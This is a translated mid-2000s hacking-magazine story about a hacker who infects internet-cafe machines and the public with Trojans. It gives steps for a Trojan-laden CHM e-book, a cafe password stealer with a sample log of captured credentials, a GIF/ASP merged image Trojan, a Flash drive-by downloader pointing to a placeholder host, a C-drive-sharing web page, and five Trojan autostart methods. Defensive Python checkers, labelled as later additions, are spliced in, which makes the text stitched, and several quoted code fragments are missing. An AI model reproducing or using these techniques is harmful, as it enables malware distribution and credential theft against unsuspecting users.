Hack ultimate case: the Black God's five secret operations

ID MYHACK58:62200610635
Type myhack58
Reporter Anonymous (佚名)
Modified 2006-07-23T00:00:00


The night, which embraces all things, is full of mystery......

The night is the hackers' world: in the evening the Internet is fast, and webmasters' vigilance is lax. For these reasons, many things that should never have happened play out at night......

At 12 o'clock sharp, the Black God, dressed in black, once again quietly appeared on the Internet from an Internet cafe and began the night's five big secret operations......

The first act: the e-book that carries its own little horse

The Black God's toolbox is filled with all kinds of novel hacking software, among which Theef (Figure 1) is a powerful DLL Trojan. The Trojan offers custom insertion into system processes, file management, process management, window management, keystroke recording, control through DOS commands, writing and running BAT and VBS scripts, point-to-point chat, screen capture, screen control, and a whole bunch of prank functions.



The Black God took the Theef Trojan and the e-book production tool Microsoft HTML HELP Workshop v1.32 out of the toolbox. Then he downloaded from the Internet a chm-format e-book, the classic dialogue of "Flirting Scholar" (唐伯虎点秋香之经典对白) (as shown in Figure 2). Men take pleasure in chasing girls, and the Black God is no exception. ^-^ The Black God opened the e-book, right-clicked a blank area of the main window that popped up, selected “Properties”, and learned that its URL is mk:@MSITStore:C:\WINNT\system32\唐伯虎点秋香之经典对白.chm::/唐伯虎点秋香之经典对白. Then the Black God created a new text file and entered the following code:

The following is quoted fragment:

After completion, he saved it as the web page file MM.htm. After taking a deep breath, the Black God started the installed Microsoft HTML HELP Workshop tool and selected the menu item “File” → “Decompile”. He located the e-book at C:\WINNT\system32\唐伯虎点秋香之经典对白.chm and changed the save path to E:\hack. Then he dragged and dropped the Trojan client file Server210.exe into that folder. After that he created a new text file and entered the following content:

The following is quoted fragment:

[OPTIONS]
Compatibility=1.1 or later
Compiled file=Cliconf.chm
Default Window=Main
Language=0x804 Chinese(China)

[WINDOWS]
Main="SQL Server Client Network Utility is what?","唐伯虎点秋香之经典对白.hhc","唐伯虎点秋香之经典对白.hhk","mm.htm",,,,,,0x420,150,0x104e,,0x0,0x0,,,,,0

[Files]
mm.htm
Server210.exe

When the input was complete, he named the file mm.hhp and stored it in the E:\hack folder. Then, in Microsoft HTML HELP Workshop, he opened mm.hhp and chose to save all files and compile. After closing the program and entering the E:\hack directory, the Black God snapped his fingers with a flourish: the e-book Trojan was done!

Trojan in hand, the Black God immediately logged in to a network hard disk space site where he had already registered, and created a directory named after Tang Bohu for the operation. Then he uploaded the compiled Trojan e-book to that directory and left it sitting there. Anyone who downloads this e-book gets a pony for free!

The second act: a Trojan secretly installed in the cafe

The Black God had just finished uploading the e-book Trojan when a burst of noisy voices came from inside the cafe: “Boss, give us a few machines, we want to play Legend.” “It's that gang of online-game players again,” the boss muttered under his breath...... Hey, how could he have forgotten about this. A sly smile appeared on the Black God's face, and he quickly looked over the cafe's management system. He decided to use the Trojan Password Stammer 4.10 (as shown in Figure 3). This is the stuff of legend: on Windows 9X/2000/XP it can capture the passwords of almost all common windows and web logins, as well as the passwords of a variety of online games. What makes the Trojan most practical is that no antivirus software intercepts it, and it can successfully hide from antivirus in-memory detection.


Before installing Password Stammer, the damned Restore Wizard has to be disabled, so the Black God immediately brought out the hacking tool Restore Transfer Master (as shown in Figure 4). The tool can install any software without destroying Restore Wizard, and the installed files still exist even after the computer restarts. The Black God first downloaded the Trojan from the network to the machine. Then, in the field for the EXE to be transferred, he entered the Trojan's local path c:\winnt\木马.exe (木马 means “Trojan”). After that, he chose c:\winnt\system32\木马.exe as the address the Trojan is transferred to, and modified the icon. Finally, he selected Save and double-clicked the program to start the Trojan running......


Before long, the Black God received the following e-mail:

Number:0001 time:2005-3-12 20:26:03 Thursday
-------- 00080534(380,130): 45748795: QQ user login->
Prompt box: the user number:
Selection box: 15663xx
Prompt box: user password:
Password box: 13142
Prompt box: the application password protection, to ensure that number safe

Number:0002 time:2005-3-12 20:29:10 Thursday
-------- 001805ae(415,558): Outlook Express - main identity: Internet account: hc_zhang01@163.com properties of the server->
Prompt box: the server information
Prompt box: the outgoing mail server
Input box: pop.163.com
Message box: send mail(SMTP)(&U):
Input box: smtp.163.com
Prompt box: account name(&C):
Input box: XXXXx011
Tips box: password(&P):
Password box:*88803

The Black God got up, went to the cashier and bought a pack of cigarettes, glancing at the network administrator's face along the way and thinking that tomorrow he was sure to have an ugly time of it......

The third act: the picture Trojan dessert

“Damn, a few days ago a netizen sent me what he said was a picture of a girl; when I opened that picture, the computer got infected with a hybrid virus......” When the Black God, back at his seat, heard this remark, a “flash of wisdom” crossed his mind. Why not make a picture Trojan to gallop around the network and give the people online an unexpected surprise! No sooner said than done: the Black God immediately began to set up the environment for a picture that carries a Trojan. The principle of the picture Trojan is to combine two pieces of code and unpack them.

The Black God first downloaded the Ice Fox Prodigal ASP Trojan from the network, then changed the suffix of the client's name to “*.gif” and used the fault-tolerant format: . After that, he created a new ASP file, entered the code: and saved it as the file “ASP.gif”. At this point the picture ASP Trojan file was done.

Whistling, the Black God began to merge the two files. First he changed the suffix of “ASP.gif” to make it “ASP.ASP”. Then he downloaded from the network a picture of a beautiful girl (as shown in Figure 5), named it mm.gif and placed it in the HACK folder on the E drive. After that, he brought up the command prompt and entered the command: e:\hack>copy mm.gif /b + asp.asp /a GG.gif. The system then generated an image Trojan file called GG.gif.


Next the Black God began to consider how to upload the Trojan to the network. Got it: the picture upload function of a BBS could be used. So he went straight to a BBS, registered a new user and logged in. After entering a suitable section, the Black God chose to publish a new post, titled it “must see”, and uploaded the picture Trojan. Once the post was submitted, all that remained was to wait for viewers to get caught. Hey hey!
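Seen from the BBS side, both picture tricks in this act can be caught at upload time by validating the file's structure rather than its extension. The following added example (not part of the original article) walks the GIF block structure and rejects renamed scripts and images with data merged after the GIF trailer; the sample bytes and the placeholder script text are constructed.

```python
MARKERS = (b"<%", b"<script", b"<?")        # server-side script openers to look for

def gif_end(data):
    """Walk the GIF block structure; return the offset just past the trailer, or None."""
    if len(data) < 13 or data[:6] not in (b"GIF87a", b"GIF89a"):
        return None
    def table(packed):                      # colour-table size in bytes, 0 if absent
        return 3 * (2 << (packed & 7)) if packed & 0x80 else 0
    def skip_sub_blocks(p):                 # length-prefixed sub-blocks end with 0x00
        while data[p]:
            p += data[p] + 1
        return p + 1
    pos = 13 + table(data[10])              # header + logical screen descriptor
    try:
        while True:
            block = data[pos]
            if block == 0x3B:               # trailer: the image ends here
                return pos + 1
            if block == 0x21:               # extension: label byte, then sub-blocks
                pos = skip_sub_blocks(pos + 2)
            elif block == 0x2C:             # image descriptor, optional table, LZW data
                pos = skip_sub_blocks(pos + 10 + table(data[pos + 9]) + 1)
            else:
                return None
    except IndexError:                      # truncated or malformed file
        return None

def inspect_upload(data):
    """Return a list of reasons to reject an uploaded .gif; empty means it passed."""
    end = gif_end(data)
    if end is None:
        return ["not a well-formed GIF"]
    tail = data[end:].lower()
    reasons = []
    if tail:
        reasons.append("%d bytes after GIF trailer" % len(tail))
    reasons += ["script marker %r in trailing data" % m.decode()
                for m in MARKERS if m in tail]
    return reasons

# Constructed 1x1 GIF, plus a constructed non-functional stand-in for merged script text.
TINY_GIF = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00" b"\x00\x00\x00\xff\xff\xff"
            b"\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00" b"\x02\x02\x44\x01\x00" b"\x3b")
MERGED = TINY_GIF + b"<% ' placeholder %>\x1a"

if __name__ == "__main__":
    print(inspect_upload(TINY_GIF), inspect_upload(MERGED))
```

Structural checks complement, and do not replace, storing uploads where the web server never interprets them as scripts and re-encoding images before serving them.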

The fourth act: the Flash Trojan crisis

Music sounded from the Black God's headphones, and the melodious sound once again triggered his inspiration: why not make a Flash animation Trojan and catch viewers off guard? A Flash Trojan works as follows: when a user browses a malicious web page with the Flash animation embedded, a Trojan or virus is automatically downloaded and executed along with the Flash, and then controls the other party's machine or steals their passwords.

The Black God rolled up his sleeves and got to work: he opened Flash MX and chose to create a new Flash file. Then, in the “Properties” panel at the lower end of the interface, he clicked the “size” button and, in the “Document Properties” dialog box that popped up, set the width and height to the minimum of 1PX. After that, in the animation bar, the Black God selected “action” → “actions” and entered the Trojan path in getURL: http:\\www.xxxx.net. Finally, he output the file and generated the Flash animation.

Hey, next it was necessary to find a sucker site and upload the freshly produced Flash animation. He went to http://www.xxx.3bbs.com, registered a new user, and then submitted the Flash animation in a post. Thus, once a “daredevil” opens this page, his machine downloads the Trojan in the background. If the other party does not pay attention to checking the process list, they simply cannot know that the machine has a Trojan. In addition, the Flash can also be sent directly to friends through QQ (Figure 6).


The fifth act: the classic web page Trojan

Having finished the Flash animation Trojan, the Black God thought: hasn't IE also had a lot of vulnerabilities exposed? So why not use IE's own vulnerabilities to write a web page Trojan. When users browse a web page written to exploit IE's own vulnerabilities, the registry is modified into a mess, the IE title, home page and so on are altered, the Registry Editor is disabled...... Those are all the handiwork of web page Trojans. The Black God intended to prepare a web page such that, when users browse the specified page, sharing of the hard disk is opened automatically.

The preceding code is as follows:

When the entry is complete, save it as the file GG.htm and upload it to the web space. A compact web page Trojan is thus done. Immediately after producing this Trojan, the Black God went to 163 to apply for a redirecting domain name, http://www.XXXX.net, connected to the destination address. When users browse this page, their C drive will be shared.

Five tricks for Trojan autostart

The Black God suddenly felt that a knife can kill people and can also save people. Some hackers only know how to plant a horse on the other party's computer remotely, but do not know the methods that make the Trojan run. A horse that is not active is a dead horse, useless. So he decided to write down a few must-learn tricks for activating a Trojan.

The first trick: using Autorun.inf

In a text file, enter the following content:

The following is quoted fragment:

[AUTORUN]
open=木马.exe

Then save it as Autorun.inf, and place it together with the Trojan server file in the root directory of any drive on the target machine. After startup, Windows automatically looks for Autorun.inf in the root directory of each disk; once it finds this file, the system automatically runs the program set in it.

The second trick: using the registry

Many hackers are aware that programs which run automatically with Windows have mostly added an autostart item in the registry. Accordingly, a Trojan can be added to the registry in the same way. For example, suppose the Trojan server on the target host is placed on the E disk. Create a new text file and enter the following:

The following is quoted fragment:

REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Error"="e:\\木马.exe"

Then save it as the registry file arun.reg. Next, create another text file and enter:

The following is quoted fragment:

[autorun]
open=regedit/s arun.reg

Save the file as autorun.inf. Then put the Trojan server together with the two new files into the root directory of the target host's hard disk. After the other party's computer starts for the first time, the Trojan is added to the registry; at the second restart, the Trojan is activated.

The third trick: using win.ini

The win.ini file is located in the c:\windows directory on Windows 98, and in the c:\winnt directory on Windows 2000 and Windows XP. Use Notepad to open the target host's win.ini file and write the autostart command:

The following is quoted fragment:

[windows]
load=c:\winnt\木马.exe

Then save and exit. After that, place the prepared Trojan server into the c:\winnt directory. As soon as the other party's computer is restarted for the first time, the Trojan is activated.

The fourth trick: using system.ini

This method serves the same purpose as the previous one. The system.ini file is located in the c:\windows directory on Windows 98, and in the c:\windows directory on Windows 2000 and Windows XP. Use Notepad to open the target host's system.ini file and write the autostart command:

The following is quoted fragment:

[boot]
shell=EXPlorer.exe c:\winnt\木马.exe

Save and exit. After that, place the prepared Trojan server into the c:\winnt directory. After the target host restarts for the first time, the Trojan is executed immediately and automatically.

The fifth trick: using the startup group

On the target host, go to "Documents and Settings\Administrator\Start Menu\Programs\Startup" on the system disk and place the Trojan server in that directory. Then set the file's attribute to hidden, and set the system not to show hidden files and folders.
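A defender-side check for the first four autostart locations listed above, as an added example that is not from the original article: it parses Autorun.inf, win.ini, system.ini and REGEDIT4 text and reports every entry that launches a program. The sample contents are constructed, and trojan.exe is a placeholder name; the fifth location (the Startup folder) needs a directory listing that includes hidden files and is not covered here.

```python
# Constructed samples modelled on the fragments quoted above; trojan.exe is a placeholder.
SAMPLES = {
    "autorun.inf": "[AUTORUN]\nopen=regedit/s arun.reg\n",
    "win.ini": "[windows]\nload=c:\\winnt\\trojan.exe\nrun=\n",
    "system.ini": "[boot]\nshell=Explorer.exe c:\\winnt\\trojan.exe\n",
    "arun.reg": "REGEDIT4\n[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows"
                "\\CurrentVersion\\Run]\n\"Error\"=\"e:\\\\trojan.exe\"\n",
    "clean": "[boot]\nshell=Explorer.exe\n[windows]\nload=\n",
}
RUN_KEY = "\\currentversion\\run"

def parse_sections(text):
    """Parse INI-style or REGEDIT4 text into {section: {key: value}}, names lower-cased."""
    sections, current = {}, None
    for line in (raw.strip() for raw in text.splitlines()):
        if line.startswith("[") and line.endswith("]"):
            current = sections.setdefault(line[1:-1].lower(), {})
        elif "=" in line and current is not None and not line.startswith(";"):
            key, value = line.split("=", 1)
            current[key.strip().strip('"').lower()] = value.strip().strip('"')
    return sections

def audit(text):
    """Return (mechanism, value) pairs for autostart entries found in one file's text."""
    sec, findings = parse_sections(text), []
    for key in ("open", "shellexecute"):          # Autorun.inf launch commands
        if sec.get("autorun", {}).get(key):
            findings.append(("autorun.inf " + key, sec["autorun"][key]))
    for key in ("load", "run"):                   # win.ini [windows] autostart keys
        if sec.get("windows", {}).get(key):
            findings.append(("win.ini " + key, sec["windows"][key]))
    shell = sec.get("boot", {}).get("shell", "")  # system.ini shell with anything extra
    if shell.lower() not in ("", "explorer.exe"):
        findings.append(("system.ini shell", shell))
    for section, values in sec.items():           # ...\CurrentVersion\Run in a .reg file
        if section.endswith(RUN_KEY):
            findings += [("Run key " + k, v) for k, v in values.items()]
    return findings

if __name__ == "__main__":
    for name, text in SAMPLES.items():
        print(name, audit(text))
```

Every Run-key value is reported, including legitimate ones, so the output is meant to be compared against a known-good baseline for the machine.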

Strive to make every hacker a master of mounting and dismounting horses......